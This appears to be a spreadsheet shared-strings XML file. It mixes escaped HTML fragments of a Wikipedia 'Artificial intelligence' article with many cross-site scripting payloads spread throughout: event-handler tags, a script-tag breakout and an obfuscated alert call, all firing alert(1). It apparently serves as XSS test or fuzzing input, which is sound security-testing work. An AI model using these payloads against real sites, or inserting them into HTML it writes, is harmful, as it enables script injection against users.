    <t xml:space="preserve">	 &lt;/span&gt;". &lt;i&gt;SIGART Newsletter &lt;/i&gt; (37): 28–29. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1145%2F1056777.1056779"&gt;10.1145/1056777.1056779 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=SIGART+Newsletter&amp;amp;rft.atitle=Correction+to+%22A+Formal+Basis+for+the+Heuristic+Determination+of+Minimum+Cost+Paths%22&amp;amp;rft.issue=37&amp;amp;rft.pages=28-29&amp;amp;rft.date=1972&amp;amp;rft_id=info%3Adoi%2F10.1145%2F1056777.1056779&amp;amp;rft.aulast=Hart&amp;amp;rft.aufirst=P.+E.&amp;amp;rft.au=Nilsson%2C+N.+J.&amp;amp;rft.au=Raphael%2C+B.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;track draggable="true" ondrag="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;small id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;nav onbeforecut="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onmousedown="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-statslink"&gt;&lt;a href="https://stats.wikimedia.org/#/en.wikipedia.org"&gt;Statistics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTERussellNorvig200916-30"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTERussellNorvig200916_30-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;output onblur=alert(1) tabindex=1 id=x&gt;&lt;/output&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;small onblur=alert(1) tabindex=1 id=x&gt;&lt;/small&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;sup id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;legend id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onkeydown="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;center draggable="true" ondragleave="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Steve_Omohundro" title="Steve Omohundro"&gt;Steve Omohundro &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Symbolic_artificial_intelligence" title="Symbolic artificial intelligence"&gt;Symbolic &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			Tools</t>
  </si>
  <si>
    <t>&lt;aside onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/aside&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmousemove="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The relationship between automation and employment is complicated. While automation eliminates old jobs, it also creates new jobs through micro-economic and macro-economic effects.&lt;sup id="cite_ref-384" class="reference"&gt;&lt;a href="#cite_note-384"&gt;&amp;#91;373&amp;#93; &lt;/a&gt; &lt;/sup&gt; Unlike previous waves of automation, many middle-class jobs may be eliminated by artificial intelligence; &lt;i&gt;&lt;a href="/wiki/The_Economist" title="The Economist"&gt;The Economist &lt;/a&gt; &lt;/i&gt; states that "the worry that AI could do to white-collar jobs what steam power did to blue-collar ones during the Industrial Revolution" is "worth taking seriously".&lt;sup id="cite_ref-385" class="reference"&gt;&lt;a href="#cite_note-385"&gt;&amp;#91;374&amp;#93; &lt;/a&gt; &lt;/sup&gt; Subjective estimates of the risk vary widely; for example, Michael Osborne and &lt;a href="/wiki/Carl_Benedikt_Frey" title="Carl Benedikt Frey"&gt;Carl Benedikt Frey &lt;/a&gt; estimate 47% of U.S. jobs are at "high risk" of potential automation, while an OECD report classifies only 9% of U.S. jobs as "high risk".&lt;sup id="cite_ref-386" class="reference"&gt;&lt;a href="#cite_note-386"&gt;&amp;#91;375&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-387" class="reference"&gt;&lt;a href="#cite_note-387"&gt;&amp;#91;376&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-388" class="reference"&gt;&lt;a href="#cite_note-388"&gt;&amp;#91;377&amp;#93; &lt;/a&gt; &lt;/sup&gt; Jobs at extreme risk range from paralegals to fast food cooks, while job demand is likely to increase for care-related professions ranging from personal healthcare to the clergy.&lt;sup id="cite_ref-389" class="reference"&gt;&lt;a href="#cite_note-389"&gt;&amp;#91;378&amp;#93; &lt;/a&gt; &lt;/sup&gt; Author &lt;a href="/wiki/Martin_Ford_(author)" title="Martin Ford (author)"&gt;Martin Ford &lt;/a&gt; and others go further and argue that many jobs are routine, repetitive and (to an AI) predictable; Ford warns that these jobs may be automated in the next couple of decades, and that many of the new jobs may not be "accessible to people with average capability", even with retraining. Economists point out that in the past technology has tended to increase rather than reduce total employment, but acknowledge that "we're in uncharted territory" with AI.&lt;sup id="cite_ref-guardian_jobs_debate_24-1" class="reference"&gt;&lt;a href="#cite_note-guardian_jobs_debate-24"&gt;&amp;#91;24&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onmouseenter="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmouseleave="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;aside onblur=alert(1) tabindex=1 id=x&gt;&lt;/aside&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 1. </t>
  </si>
  <si>
    <t>&lt;option onpointerover=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;var onmouseenter="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;caption id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/caption&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a class="mw-jump-link" href="#mw-head"&gt;Jump to navigation &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointermove=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-389"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-389"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Sociology_of_scientific_knowledge" title="Sociology of scientific knowledge"&gt;Sociology of scientific knowledge &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;A. J. Robinson and F. Fallside. The utility driven dynamic error propagation network. Technical Report CUED/F-INFENG/TR.1, Cambridge University Engineering Department, 1987. </t>
  </si>
  <si>
    <t>&lt;wbr draggable="true" ondragend="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;span onpaste="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;figure onload=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;template id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;small onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/small&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;output oncut="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;body ondrop=alert(1) contenteditable&gt;drop here&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-General_intelligence-19"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-General_intelligence_19-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-General_intelligence_19-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;tfoot onpaste="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;track onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/track&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;meta oncontextmenu="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Manfred_Clynes" title="Manfred Clynes"&gt;Manfred Clynes &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;output id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Expectation-maximization, one of the most popular algorithms in machine learning, allows clustering in the presence of unknown &lt;a href="/wiki/Latent_variables" class="mw-redirect" title="Latent variables"&gt;latent variables &lt;/a&gt;&lt;sup id="cite_ref-FOOTNOTEDomingos2015210_207-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015210-207"&gt;&amp;#91;202&amp;#93; &lt;/a&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;mark onbeforepaste="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:ParticleSwarmArrowsAnimation.gif" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/e/ec/ParticleSwarmArrowsAnimation.gif/220px-ParticleSwarmArrowsAnimation.gif" decoding="async" width="220" height="165" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/e/ec/ParticleSwarmArrowsAnimation.gif/330px-ParticleSwarmArrowsAnimation.gif 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/e/ec/ParticleSwarmArrowsAnimation.gif/440px-ParticleSwarmArrowsAnimation.gif 2x" data-file-width="560" data-file-height="420" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Ask a question in the &lt;a class="reference external" href="irc://irc.freenode.net/scrapy"&gt;#scrapy IRC channel&lt;/a&gt;,&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;img id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;center onmouseup="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFCNN2006"&gt;&lt;i&gt;CNN &lt;/i&gt; 2006 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;keygen oncut="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Hugh_of_Saint_Victor" title="Hugh of Saint Victor"&gt;Hugh of Saint Victor &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointerdown=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href="#CITEREFGödel1951"&gt;Gödel 1951 &lt;/a&gt;: in this lecture, &lt;a href="/wiki/Kurt_G%C3%B6del" title="Kurt Gödel"&gt;Kurt Gödel &lt;/a&gt; uses the incompleteness theorem to arrive at the following disjunction: (a) the human mind is not a consistent finite machine, or (b) there exist &lt;a href="/wiki/Diophantine_equations" class="mw-redirect" title="Diophantine equations"&gt;Diophantine equations &lt;/a&gt; for which it cannot decide whether solutions exist. Gödel finds (b) implausible, and thus seems to have believed the human mind was not equivalent to a finite machine, i.e., its power exceeded that of any finite machine. He recognized that this was only a conjecture, since one could never disprove (b). Yet he considered the disjunctive conclusion to be a "certain fact". </t>
  </si>
  <si>
    <t>&lt;b onbeforecut="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;script&gt;alert('');&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;i oncontextmenu="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;rtc oncut="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;option oncopy="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;map ondrop=alert(1) contenteditable&gt;drop here&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onmousemove="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;p draggable="true" ondragend="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_motion" title="Philosophy of motion"&gt;Motion &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onpointerover=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;dl onclick="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworth2017"&gt;Poole &amp;amp; Mackworth 2017 &lt;/a&gt;, Section 3.6 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Progress_in_artificial_intelligence" title="Progress in artificial intelligence"&gt;Progress &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=10" title="Edit section: Perception"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;source style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;footer id=x tabindex=1 onfocus=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;object onmouseenter="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onclick="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;article onmouseout="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;audio onload=alert(1)&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;col onmouseleave="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset ondblclick="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Kalman_filter" title="Kalman filter"&gt;Kalman filters &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;base id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Optical_disc#Fourth-generation" title="Optical disc"&gt;Fourth-generation optical discs &lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h1 id="firstHeading" class="firstHeading" lang="en"&gt;Artificial intelligence &lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;xmp oncut="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Epicureanism" title="Epicureanism"&gt;Epicureans &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/OpenAI" title="OpenAI"&gt;OpenAI &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;html draggable="true" ondragend="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>top[‘al\145rt’](1)</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/ol&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;embed onbeforecopy="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;spacer oncopy="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-53"&gt;&lt;a href="#Social_justice"&gt;&lt;span class="tocnumber"&gt;8.2.3 </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;svg ondrop=alert(1) contenteditable&gt;drop here&lt;/svg&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-13"&gt;&lt;a href="#General_intelligence"&gt;&lt;span class="tocnumber"&gt;4.9 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;sup id="cite_ref-The_Economist_135-0" class="reference"&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointerleave=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;script onmouseout="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-35"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-35"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;xmp onclick="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Embodied_agent" title="Embodied agent"&gt;Embodied &lt;/a&gt; approaches to AI:</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;q ondrop=alert(1) contenteditable&gt;drop here&lt;/q&gt;</t>
  </si>
  <si>
    <t>As an example, AI is being applied to the high cost problem of dosage issues—where findings suggested that AI could save $16 billion. In 2016, a ground breaking study in California found that a mathematical formula developed with the help of AI correctly determined the accurate dose of immunosuppressant drugs to give to organ patients.&lt;sup id="cite_ref-300" class="reference"&gt;&lt;a href="#cite_note-300"&gt;&amp;#91;289&amp;#93; &lt;/a&gt; &lt;/sup&gt;  &lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="toc" class="toc" role="navigation" aria-labelledby="mw-toc-heading"&gt;&lt;input type="checkbox" role="button" id="toctogglecheckbox" class="toctogglecheckbox" style="display:none" /&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onpointerleave=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Interest in &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;neural networks &lt;/a&gt; and "&lt;a href="/wiki/Connectionism" title="Connectionism"&gt;connectionism &lt;/a&gt;" was revived by &lt;a href="/wiki/David_Rumelhart" title="David Rumelhart"&gt;David Rumelhart &lt;/a&gt; and others in the middle of the 1980s.&lt;sup id="cite_ref-Revival_of_connectionism_172-0" class="reference"&gt;&lt;a href="#cite_note-Revival_of_connectionism-172"&gt;&amp;#91;169&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;Artificial neural networks &lt;/a&gt; are an example of &lt;a href="/w/index.php?title=Soft_computing&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Soft computing (page does not exist)"&gt;soft computing &lt;/a&gt;—they are solutions to problems which cannot be solved with complete logical certainty, and where an approximate solution is often sufficient. Other &lt;a href="/w/index.php?title=Soft_computing&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Soft computing (page does not exist)"&gt;soft computing &lt;/a&gt; approaches to AI include &lt;a href="/wiki/Fuzzy_system" class="mw-redirect" title="Fuzzy system"&gt;fuzzy systems &lt;/a&gt;, &lt;a href="/wiki/Grey_system_theory" class="mw-redirect" title="Grey system theory"&gt;Grey system theory &lt;/a&gt;, &lt;a href="/wiki/Evolutionary_computation" title="Evolutionary computation"&gt;evolutionary computation &lt;/a&gt; and many statistical tools. The application of soft computing to AI is studied collectively by the emerging discipline of &lt;a href="/wiki/Computational_intelligence" title="Computational intelligence"&gt;computational intelligence &lt;/a&gt;.&lt;sup id="cite_ref-Computational_intelligence_173-0" class="reference"&gt;&lt;a href="#cite_note-Computational_intelligence-173"&gt;&amp;#91;170&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;526–527 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Holley-365"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Holley_365-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;marquee id=x tabindex=1 onfocus=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.researchgate.net/publication/333242550"&gt;"Current applications of Artificial Intelligence in tourism and hospitality" &lt;/a&gt;. &lt;i&gt;Sinteza &lt;/i&gt;. 2019&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;14 January </t>
  </si>
  <si>
    <t>&lt;dialog id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/dialog&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;select onpaste="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Sample, Ian (14 March 2017). &lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/global/2017/mar/14/googles-deepmind-makes-ai-program-that-can-learn-like-a-human"&gt;"Google's DeepMind makes AI program that can learn like a human" &lt;/a&gt;. &lt;i&gt;the Guardian &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;26 April </t>
  </si>
  <si>
    <t>&lt;source onmouseleave="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;div id="mw-head-base" class="noprint"&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onbeforecut="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;tbody ondblclick="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;content draggable="true" ondragleave="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;param onkeyup="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;nextid id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpointerover=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onmouseover="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;blink style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onpointerenter=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Finance_and_economics"&gt;Finance and economics </t>
  </si>
  <si>
    <t>&lt;label onmouseleave="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmouseleave="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;AI often revolves around the use of &lt;a href="/wiki/Algorithms" class="mw-redirect" title="Algorithms"&gt;algorithms &lt;/a&gt;. An algorithm is a set of unambiguous instructions that a mechanical computer can execute.&lt;sup id="cite_ref-66" class="reference"&gt;&lt;a href="#cite_note-66"&gt;&amp;#91;b&amp;#93; &lt;/a&gt; &lt;/sup&gt; A complex algorithm is often built on top of other, simpler, algorithms. A simple example of an algorithm is the following (optimal for first player) recipe for play at &lt;a href="/wiki/Tic-tac-toe" title="Tic-tac-toe"&gt;tic-tac-toe &lt;/a&gt;:&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_1_67-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_1-67"&gt;&amp;#91;65&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Formal_methods_in_AI-43"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Formal_methods_in_AI_43-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Formal_methods_in_AI_43-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;applet ondragover=alert(1) contenteditable&gt;drop here&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Capek_play.jpg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;The word "robot" itself was coined by &lt;a href="/wiki/Karel_%C4%8Capek" title="Karel Čapek"&gt;Karel Čapek &lt;/a&gt; in his 1921 play &lt;i&gt;&lt;a href="/wiki/R.U.R." title="R.U.R."&gt;R.U.R. &lt;/a&gt; &lt;/i&gt;, the title standing for "&lt;a href="/wiki/Rossum%27s_Universal_Robots" class="mw-redirect" title="Rossum&amp;#39;s Universal Robots"&gt;Rossum's Universal Robots &lt;/a&gt;" &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpointerover=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;sub id=x tabindex=1 onactivate=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;small onpointermove=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;noembed draggable="true" ondragend="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;custom tags onpointermove=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/wiki/Robotic_arm" title="Robotic arm"&gt;robotic arms &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;spacer id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;link rel=stylesheet href=1 onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Mathematical_definitions_of_intelligence-287"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Mathematical_definitions_of_intelligence_287-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;xmp draggable="true" ondragstart="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
